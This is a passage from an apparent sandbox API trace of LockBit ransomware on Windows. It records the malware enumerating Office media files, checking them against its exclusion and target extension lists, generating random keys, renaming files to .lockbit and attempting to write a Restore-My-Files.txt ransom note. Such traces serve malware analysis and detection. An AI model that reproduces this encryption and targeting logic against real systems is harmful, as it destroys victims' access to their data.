dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.674] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ec5c200, ftCreationTime.dwHighDateTime=0x1be2706, ftLastAccessTime.dwLowDateTime=0xbd4a0b80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x9ec5c200, ftLastWriteTime.dwHighDateTime=0x1be2706, nFileSizeHigh=0x0, nFileSizeLow=0x7b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0196164.WMF", cAlternateFileName="")) returned 1 [0196.674] lstrcmpiW (lpString1=".", lpString2="J0196164.WMF") returned -1 [0196.674] lstrcmpiW (lpString1="..", lpString2="J0196164.WMF") returned -1 [0196.674] PathFindExtensionW (pszPath="J0196164.WMF") returned=".WMF" [0196.674] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0196.674] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0196.674] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0196.674] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0196.674] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0196.674] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0196.674] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0196.674] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0196.674] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0196.674] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0196.674] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0196.674] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0196.674] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0196.675] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0196.675] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0196.675] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0196.675] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0196.675] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0196.675] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0196.675] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0196.675] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0196.675] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0196.675] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0196.675] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0196.675] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.675] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0196.675] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0196.675] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0196.675] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0196.675] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0196.675] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0196.675] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0196.676] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0196.676] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0196.676] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0196.676] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0196.676] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0196.676] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0196.676] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0196.676] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0196.676] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0196.676] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0196.676] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.676] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0196.676] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0196.676] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0196.676] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0196.676] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0196164.WMF") returned 1 [0196.676] lstrcmpiW (lpString1="ntldr", lpString2="J0196164.WMF") returned 1 [0196.676] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0196164.WMF") returned 1 [0196.676] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0196164.WMF") returned -1 [0196.676] lstrcmpiW (lpString1="autorun.inf", lpString2="J0196164.WMF") returned -1 [0196.676] lstrcmpiW (lpString1="thumbs.db", lpString2="J0196164.WMF") returned 1 [0196.676] lstrcmpiW (lpString1="iconcache.db", lpString2="J0196164.WMF") returned -1 [0196.676] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0196.677] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0196164.WMF") returned=".WMF" [0196.677] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.677] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.677] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0196.677] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0196.677] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0196.677] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0196.677] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0196.677] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0196.677] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0196.677] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.677] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0196.677] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0196.677] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0196.677] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0196.677] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0196.677] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0196.677] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0196.677] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0196.677] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0196.677] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0196.677] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0196.677] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0196.678] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0196.678] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0196.678] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0196.678] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0196.678] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0196.678] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0196.678] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0196164.WMF.lockbit") returned 70 [0196.678] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0196164.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0196164.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0196.679] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.680] malloc (_Size=0x40068) returned 0x1ff1e60 [0196.680] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1970) returned 1 [0196.680] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.680] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.680] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0196.680] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.681] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.681] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0196.681] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0196.683] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0196164.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0196164.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.683] malloc (_Size=0xa2) returned 0x1fa2ed8 [0196.683] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0196.685] free (_Block=0x1fa2ed8) [0196.685] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0196164.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0196.685] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0196.685] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.685] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81ec6b00, ftCreationTime.dwHighDateTime=0x1be390f, ftLastAccessTime.dwLowDateTime=0xbd4a0b80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x81ec6b00, ftLastWriteTime.dwHighDateTime=0x1be390f, nFileSizeHigh=0x0, nFileSizeLow=0x1216, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0196374.WMF", cAlternateFileName="")) returned 1 [0196.685] lstrcmpiW (lpString1=".", lpString2="J0196374.WMF") returned -1 [0196.685] lstrcmpiW (lpString1="..", lpString2="J0196374.WMF") returned -1 [0196.685] PathFindExtensionW (pszPath="J0196374.WMF") returned=".WMF" [0196.685] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0196.685] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0196.685] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0196.686] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0196.686] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0196.686] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0196.686] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0196.686] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0196.686] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0196.686] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0196.686] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0196.686] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0196.686] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0196.686] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0196.686] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0196.686] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0196.686] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0196.686] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0196.686] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0196.686] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0196.686] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0196.686] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0196.686] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0196.687] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0196.687] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.687] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0196.687] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0196.687] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0196.687] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0196.687] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0196.687] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0196.687] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0196.687] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0196.687] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0196.687] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0196.687] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0196.687] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0196.687] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0196.687] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0196.687] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0196.687] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0196.687] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0196.687] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.687] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0196.688] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0196.688] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0196.688] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0196.688] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0196374.WMF") returned 1 [0196.688] lstrcmpiW (lpString1="ntldr", lpString2="J0196374.WMF") returned 1 [0196.688] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0196374.WMF") returned 1 [0196.688] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0196374.WMF") returned -1 [0196.688] lstrcmpiW (lpString1="autorun.inf", lpString2="J0196374.WMF") returned -1 [0196.688] lstrcmpiW (lpString1="thumbs.db", lpString2="J0196374.WMF") returned 1 [0196.688] lstrcmpiW (lpString1="iconcache.db", lpString2="J0196374.WMF") returned -1 [0196.688] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0196.688] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0196374.WMF") returned=".WMF" [0196.688] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.688] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.688] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0196.688] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0196.688] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0196.688] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0196.688] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0196.688] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0196.688] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0196.689] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.689] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0196.689] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0196.689] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0196.689] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0196.689] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0196.689] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0196.689] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0196.689] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0196.689] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0196.689] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0196.689] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0196.689] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0196.689] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0196.689] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0196.689] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0196.689] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0196.689] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0196.689] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0196.689] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0196374.WMF.lockbit") returned 70 [0196.689] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0196374.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0196374.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0196.691] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.691] malloc (_Size=0x40068) returned 0x3d70450 [0196.691] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=4630) returned 1 [0196.691] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.692] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.692] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0196.692] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.692] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.692] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0196.692] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0196.694] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0196374.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0196374.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.694] malloc (_Size=0xa2) returned 0x1fa2ed8 [0196.694] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0196.696] free (_Block=0x1fa2ed8) [0196.696] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0196374.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0196.696] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0196.696] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.696] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x929ce100, ftCreationTime.dwHighDateTime=0x1be390f, ftLastAccessTime.dwLowDateTime=0xbd4c6ce0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x929ce100, ftLastWriteTime.dwHighDateTime=0x1be390f, nFileSizeHigh=0x0, nFileSizeLow=0x8cbe, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0196400.WMF", cAlternateFileName="")) returned 1 [0196.696] lstrcmpiW (lpString1=".", lpString2="J0196400.WMF") returned -1 [0196.696] lstrcmpiW (lpString1="..", lpString2="J0196400.WMF") returned -1 [0196.696] PathFindExtensionW (pszPath="J0196400.WMF") returned=".WMF" [0196.696] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0196.696] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0196.696] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0196.697] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0196.697] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0196.697] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0196.697] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0196.697] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0196.697] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0196.697] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0196.697] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0196.697] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0196.697] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0196.697] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0196.697] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0196.697] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0196.697] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0196.697] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0196.697] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0196.697] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0196.697] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0196.697] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0196.697] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0196.698] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0196.698] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.698] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0196.698] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0196.698] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0196.698] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0196.698] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0196.698] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0196.698] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0196.698] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0196.698] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0196.698] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0196.698] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0196.698] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0196.698] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0196.698] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0196.698] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0196.698] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0196.698] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0196.698] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.699] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0196.699] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0196.699] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0196.699] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0196.699] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0196400.WMF") returned 1 [0196.699] lstrcmpiW (lpString1="ntldr", lpString2="J0196400.WMF") returned 1 [0196.699] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0196400.WMF") returned 1 [0196.699] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0196400.WMF") returned -1 [0196.699] lstrcmpiW (lpString1="autorun.inf", lpString2="J0196400.WMF") returned -1 [0196.699] lstrcmpiW (lpString1="thumbs.db", lpString2="J0196400.WMF") returned 1 [0196.699] lstrcmpiW (lpString1="iconcache.db", lpString2="J0196400.WMF") returned -1 [0196.699] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0196.699] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0196400.WMF") returned=".WMF" [0196.699] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.699] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.699] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0196.699] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0196.699] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0196.699] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0196.700] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0196.700] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0196.700] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0196.700] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.700] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0196.700] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0196.700] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0196.700] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0196.700] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0196.700] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0196.700] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0196.700] lstrcmpiW (lpString1=".mwb", 